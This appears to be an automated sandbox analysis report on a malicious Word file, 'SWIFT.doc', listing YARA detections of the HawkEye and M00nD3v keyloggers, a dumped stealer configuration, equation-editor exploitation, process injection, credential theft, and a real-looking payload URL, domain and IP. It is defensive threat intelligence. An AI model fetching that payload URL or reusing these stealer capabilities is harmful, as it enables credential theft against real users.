Source: izux978537.scr, 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp String found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_LoopPasswordStealer_KeyStrokeLogger_EmptyKeyStroke_ClipboardLogger_EmptyClipboard_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Yara detected HawkEye Keylogger
Source: Yara match File source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Source: Yara match File source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE
Yara detected M00nD3v Logger
Source: Yara match File source: 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Behavior Graph (ID 330287, sample SWIFT.doc, start date 14/12/2020, architecture WINDOWS, score 100):

  • Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 13 other signatures
  • WINWORD.EXE started; dropped C:\Users\user\Desktop\~$SWIFT.doc (data)
  • EQNEDT32.EXE started (two instances); contacted mangero.ga (46.173.221.33, ports 49167, 80; GPI-ASRU, Russian Federation); dropped C:\Users\user\AppData\...\izux978537.scr (PE32) and C:\Users\user\AppData\...\hktestfile[1].scr (PE32); signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  • izux978537.scr started by EQNEDT32.EXE; signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Injects a PE file into a foreign processes
  • izux978537.scr child instances (two) started by izux978537.scr; signatures: Tries to harvest and steal browser information (history, passwords, etc); Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
  • vbc.exe (two instances) started by izux978537.scr; signatures: Tries to steal Mail credentials (via file registry); Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file access); Searches for Windows Mail specific files

Contacted Public IPs

IP: 46.173.221.33 | Domain: unknown | Country: Russian Federation | ASN: 56364 | ASN Name: GPI-ASRU | Malicious: true

Contacted Domains

Name: mangero.ga | IP: 46.173.221.33 | Active: true

Contacted URLs

Name: http://mangero.ga/izux/hktestfile.scr | Malicious: true | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown